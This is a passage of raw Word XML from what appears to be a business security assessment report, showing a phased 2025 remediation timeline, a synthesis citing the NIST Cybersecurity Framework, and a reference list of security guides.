            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="240" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="240" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="14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32" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="1b1c1d"/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Timeline</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="240" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="240" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="52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32" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="1b1c1d"/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Key Activities</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1140"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="70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Phase 1</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="14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January 15, 2025 - March 31, 2025</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="52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 Develop an incident response plan. * Upgrade your firewall. * Set up separate servers for your website and customer data.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1560"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="70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Phase 2</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="14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April 1, 2025 - June 30, 2025</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="52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 Encrypt data and improve access control. * Enforce strong passwords and multi-factor authentication. * Train employees about security best practices and the importance of cybersecurity awareness </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="575b5f"/>
                <w:sz w:val="14"/>
                <w:highlight w:val="white"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="1b1c1d"/>
                <w:sz w:val="21"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1140"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="70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Phase 3</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="14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July 1, 2025 - September 30, 2025</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="52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 Improve network monitoring and intrusion detection. * Implement a more secure wireless network.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2040"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="70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b/>
                <w:color w:val="1b1c1d"/>
                <w:sz w:val="21"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase 4</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="142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October 1, 2025 - December 31, 2025</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="5220"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0f4f9" w:fill="f0f4f9"/>
              <w:spacing w:after="0" w:before="0" w:line="411" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="1b1c1d"/>
                <w:sz w:val="21"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">* Conduct vendor risk assessments. * Implement cloud security services. * Develop and implement architecture implementation plans. * Create cybersecurity technical documentation. * Secure regulatory compliance assistance. * Review and update security measu</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="1b1c1d"/>
                <w:sz w:val="21"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">res regularly.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Synthesis</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Our security assessment revealed several vulnerabilities in your current network security that need to be addressed to protect your business and customers. The recommendations provided in this report are designed to enhance your overall security posture by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> strengthening your network security, data security, computer security, website and payment security, and incident response capabilities. By implementing these recommendations in a phased approach, you can prioritize critical measures, manage costs effecti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">vely, and ensure that your security architecture aligns with the NIST Cybersecurity Framework </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="575b5f"/>
          <w:sz w:val="14"/>
          <w:highlight w:val="white"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. This proactive approach to cybersecurity will not only protect your company from potential threats but also build trust with customers, encourage repeat business, and support your company's growth and success.</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6. Conclusion</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By following our suggestions, you can make your network much safer, protect customer data, and help your business grow.</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Existing Architecture/Topology</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="240" w:line="504" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(Insert a simple diagram or description of the company's current network setup. Keep it brief and easy to understand for executives.)</w:t>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Video Presentation</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9"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="420" w:line="403" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="30"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="120" w:line="504" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="575b5f"/>
          <w:sz w:val="14"/>
          <w:highlight w:val="white"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dataprise. (n.d.). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">10 Cybersecurity Tips for Mid-Sized Businesses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved January 6, 2025, from </w:t>
      </w:r>
      <w:hyperlink r:id="rId71" w:tooltip="https://www.dataprise.com/resources/blog/10-cybersecurity-tips-mid-sized-businesses/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0b57d0"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.dataprise.com/resources/blog/10-cybersecurity-tips-mid-sized-businesses/</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7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dig8ital. (n.d.). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">E-commerce Security Architecture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved January 6, 2025, from </w:t>
      </w:r>
      <w:hyperlink r:id="rId72" w:tooltip="https://dig8ital.com/post/ecommerce-security-architecture/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0b57d0"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://dig8ital.com/post/ecommerce-security-architecture/</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8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vita 2. (n.d.). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Architecture Report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved January 6, 2025, from </w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:tooltip="https://www.vita2.virginia.gov/uploadedFiles/Oversight/EA/SecurityArchitectureReport.pdf" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0b57d0"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.vita2.virginia.gov/uploadedFiles/Oversight/EA/SecurityArchitectureReport.pdf</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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Loffler. (n.d.). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The Top 5 Cyber Security Checkpoints You Should Know</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved January 6, 2025, from </w:t>
      </w:r>
      <w:hyperlink r:id="rId74" w:tooltip="https://www.loffler.com/blog/the-top-5-cyber-security-checkpoints-you-should-know" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0b57d0"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.loffler.com/blog/the-top-5-cyber-security-checkpoints-you-should-know</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5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> ISACA. (n.d.). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybersecurity Nexus (CSX) Fundamentals Practice Quiz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved January 6, 2025, from </w:t>
      </w:r>
      <w:hyperlink r:id="rId75" w:tooltip="https://www.isaca.org/-/media/info/csxf-practice-quiz/index.html" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0b57d0"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.isaca.org/-/media/info/csxf-practice-quiz/index.html</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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kiteworks. (n.d.). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">A Comprehensive Guide to Understanding Plan of Action and Milestones (POA&amp;Ms)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved January 6, 2025, from </w:t>
      </w:r>
      <w:hyperlink r:id="rId76" w:tooltip="https://www.kiteworks.com/secure-file-sharing/a-comprehensive-guide-to-understanding-plan-of-action-and-milestones-poams/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0b57d0"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.kiteworks.com/secure-file-sharing/a-comprehensive-guide-to-understanding-plan-of-action-and-milestones-poams/</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0" w:before="0" w:line="504" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="575b5f"/>
          <w:sz w:val="14"/>
          <w:highlight w:val="white"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> PurpleSec. (n.d.). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybersecurity Strategy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved January 6, 2025, from </w:t>
      </w:r>
      <w:hyperlink r:id="rId77" w:tooltip="https://purplesec.us/learn/cybersecurity-strategy/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0b57d0"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://purplesec.us/learn/cybersecurity-strategy/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="0" w:line="504" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="575b5f"/>
          <w:sz w:val="14"/>
          <w:highlight w:val="white"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> CyberSeek. (n.d.). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybersecurity Supply Chain Risk Management Analyst</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved January 6, 2025, from </w:t>
      </w:r>
      <w:hyperlink r:id="rId78" w:tooltip="https://www.cyberseek.org/pathway.html" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0b57d0"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.cyberseek.org/pathway.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="24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Style w:val="138"/>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40"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="138"/>
